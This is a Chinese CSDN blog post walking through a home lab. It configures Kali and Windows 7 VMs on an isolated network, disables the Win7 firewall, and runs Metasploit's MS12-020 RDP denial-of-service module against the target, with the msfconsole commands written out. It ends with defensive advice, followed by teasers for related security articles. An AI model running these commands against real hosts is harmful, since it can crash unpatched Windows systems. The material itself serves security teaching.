漏洞-攻击

最新推荐文章于 2024-09-22 13:19:22 发布
最新推荐文章于 2024-09-22 13:19:22 发布
阅读量141 收藏
点赞数 4
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T061129/article/details/134371876
版权

简介:     
          系统漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误。某个程序在设计时未被考虑周全,这个缺陷或错误将可能被不法分子或黑客利用,通过植入木马病毒等方式来攻击或控制整个计算机,从而窃取计算机中的重要资料和信息,甚至破坏系统。系统漏洞可对用户造成不良后果。漏洞被恶意用户利用,会造成信息泄露;黑客攻击网站即是利用网络服务器操作系统的漏洞,对用户操作造成如不明原因的死机和丢失文件等。
系统漏洞主要分为两种,一种是高危漏洞,另一种是功能性漏洞:
高危漏洞:系统核心和 Office 漏洞,这些漏洞允许远程执行代码,使得电脑有被入侵的危险
功能性漏洞:软件版本更新或给系统添加实用功能,用于解决普通的电脑问题,提升电脑性能
 

kili步骤:

1.设置Vmnet4网卡 网段为192.168.2.0
编辑——虚拟网络编辑器——添加网络——vnnet4——修改vmnet4—— IP地址为:192.168.2.0

2.设置kali系统的IP地址为192.168.2.2

a).取得root权限

sudo passwd root给root配置密码

sudo passwd root

b).设置IP地址

vim /etc/network/interfaces 修改网卡配置文件最后两行

vim /etc/network/interfaces

  1. aut0 eth0

  2. iface eth0 inet static

  3. address 192.168.2.2

  4. netmask 255.255.255.0

  5. gateway 192.168.2.254

c).重启网卡

/etc/init.d/networking restart

d).重启电脑

reboot

e).查看IP地址

ifconfig

4).设置win 7的防火墙

控制面板——防火墙——关闭防火墙

6).打开kili实现win 7互通

kili:

ping 192.168.2.3

win 7:

ping 192.168.2.2

以上部分是为了接下来的漏洞攻击!

3.漏洞攻击

系统攻击概念图

1).设置攻击框架

msfconsole

2).搜索系统漏洞

search dos

3).查看ms 12-020系统漏洞

search ms 12-020找到系统漏洞的路径

search ms 12-020

4).使用系统漏洞进行攻击

use auxiliary/dos/windows/rdp/ms 12_020_maxchannelids 2012-03-16

set rhost 192.168.2.3

run

win 7的状态

在这里给各位观众老爷们再说一小点点!
如何防护:

1、及时修复系统环境中存在的安全漏洞:防范漏洞攻击最直接有效的方法就是修复系统环境中存在的安全漏洞。

2、培养良好的计算机使用习惯

a)提高计算机网络安全意识

b) 不要轻易下载不明软件程序

c) 不要轻易打开不明邮件夹带的可疑附件

d) 及时备份重要的数据文件
 

爱奿
关注
主机漏洞-SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)【原理扫描】-RC4密码套件
YNlanduiyun的博客
01-19 9496
一、漏洞分析 事件起因 2015年3月26日,国外数据安全公司Imperva的研究员Itsik Mantin在BLACK HAT ASIA 2015发表论文《Attacking SSL when using RC4》阐述了利用存在了13年之久的RC4漏洞——不变性弱密钥(《Weakness in the Key Scheduling Algorithm of RC4》,FMS 发表于2001年)进...
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5461
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSS。XSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
网站安全漏洞--大全
IT利刃出鞘的博客
05-23 9439
本文介绍网站常见的一些安全漏洞
web漏洞--会话管理漏洞
xsh951103的博客
01-07 2868
目录 1.会话劫持 2.会话固定 1.会话劫持 1.概念 会话劫持(Session hijacking),这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户。 2.攻击步骤 目标用户需要先登录站点 登录成功后,该用户会得到站点提供的一个会话标识SessionID 攻击者通过某种攻击手段捕获Session ID 攻击者通过捕获到的Se..
安全漏洞网络攻击
qq_48456652的博客
10-07 6421
目录 一、安全漏洞及产生原因 1. 安全漏洞概念 2. 漏洞产生的技术原因 3. 漏洞产生的经济原因 二、信息收集与分析 1. 攻击的过程 2. 信息收集:攻击的前奏 3.收集什么信息 4. 信息收集与分析工具 5. 公开信息收集-搜索引擎 6. 信息收集与分析 7. 信息收集与分析的防范 三、网路攻击实施 1. 网络攻击方式 2. 网络攻击方式—电子欺骗 3. 典型网络攻击—拒绝服务攻击 4. 网络攻击方式 四、后门设置与痕迹消除 1. 后门—你的就是我的 2. .
Spring爆出“核弹”级高危漏洞-复现
JavaPub
03-30 6906
文末 3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于Java的序列化机制,可导致远程代码执行(RCE),使用JDK9及以上版本皆有可能受到影响 文章目录导读事件回顾临时方案1:WAF临时策略临时方案2:临时缓解措施细数Spring漏洞危机的启示复现 参考: netsecurity.51cto.com/article/705255.html 导读 昨晚,又一枚重磅炸弹在技术圈里引爆,不,这次不是Log4j,而是Spr
Web的基本漏洞--XSS漏洞
尽欢
05-31 3974
XSS漏洞介绍、XSS漏洞攻击方式--注入脚本代码
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2610
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
永恒之蓝漏洞攻击
qq_54250695的博客
05-16 2094
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
漏洞解决方案-短信炸弹攻击
热门推荐
smart的博客
08-18 1万+
短信炸弹攻击一、前置知识二、修复方案三、代码参考 一、前置知识 短信炸弹攻击,就是通过把发送短信验证码的报文截获后进行重放造成的攻击。 威胁描述: 如果短信炸弹攻击成功,攻击者可以向该手机号一直不停的发送短信,不但因短信过多发送造成经济损失,甚至会使短信系统崩溃,无法正常提供服务。 涉及功能点: 任何涉及短信验证码发送的功能点,如用户注册、登录、转账等功能。 二、修复方案 前端控制,通过图形验证码的验证,如果验证不通过则不允许发送短信; 其次为防止类似httpclient工具直接请求没有session的情
小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本
04-20
- **XSS漏洞**: 攻击者可通过构造恶意脚本获取管理员Cookie,进一步实施攻击。 - **任意文件上传**: 攻击者可以上传恶意文件,从而获取对系统的控制权。 - **任意文件写入**: 攻击者能够修改或创建系统文件,进一步...
Vulnerability-and-Attack-Injector:漏洞攻击
05-15
漏洞攻击注入程序 漏洞攻击者 一种在PHP文件中注入SQL Injection漏洞并自动对其进行攻击的工具 这些文件中使用了该软件: JoséFonseca,Marco Vieira,Henrique Madeira,“使用漏洞攻击注入的Web安全机制...
第一节 中间件解析漏洞-IIS6.0-01
09-15
中间件解析漏洞是指在Web应用程序中,因服务器或中间件的解析机制存在漏洞,导致攻击者可以上传恶意文件,从而控制服务器或获取敏感信息。下面将对IIS6.0中间件解析漏洞进行详细介绍。 IIS6.0解析漏洞 IIS6.0...
web网站文件包含漏洞攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
kubernetes网络(一)之calico详解
最新发布
鲜少伟的博客
09-22 1148
本文介绍Kubernetes最流行的网络解决方案calico。
网络高级day03(Http)
dghbs的博客
09-21 1189
HTTP
netty编程之基于websocket发送二进制数据
wang0907的博客
09-20 566
本文看下基于websocket发送二进制数据。
linux网络编程5
qq_65818377的博客
09-21 854
将套接字修改为被动,让操作系统给该套接字设置一个连接队伍,用来记录所有连接到该套接字的连接。关闭使用socket函数创建的套接字,会导致服务器无法接收新的连接,但不会影响已经连接的;其是关闭一个代表已经连接套接字,则会出现向另外一端接收到一个长度为0的数据包;关闭accept返回的套接字,则会导致其连接关闭,但不会影响服务器的;backlog:连接队列的长度,即设置服务器最大的连接客服的数量。其返回的是一个已连接的套接字,这个套接字代表当前这个连接。connect建立连接后不会产生新的套接字;
7、论等保的必要性
weixin_43263566的博客
09-21 1036
目前,金融、电力、广电、医疗、教育等行业已经下发了相关文件。2007年6月发布的《信息安全等级保护管理办法》(公通字[2007]143号)规定了实施该制度的原则、内容、职责分工、基本要求和实施计划,明确了操作办法。梳理不同等级的系统后,应对其进行相应等级的安全防护建设,确保重要信息系统在遭受攻击时能够有效抵御,或在被攻击后快速恢复应用,以避免重大损失或影响。开展等级保护的最重要原因是通过测评工作,发现单位系统内外部的安全风险和脆弱性,整改后提升信息安全防护能力,降低被各种攻击的风险。
OpenSSL SSL-CCS注入漏洞详解与中间人攻击风险
本文档深入探讨了SSL-CCS注入漏洞及其在中间人攻击中的应用。SSL-CCS(Change Cipher Spec)漏洞最初于2014年2月24日被发现,属于OpenSSL库中的一个严重安全问题,其危害等级被标记为高危。漏洞存在于OpenSSL 1.0.1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值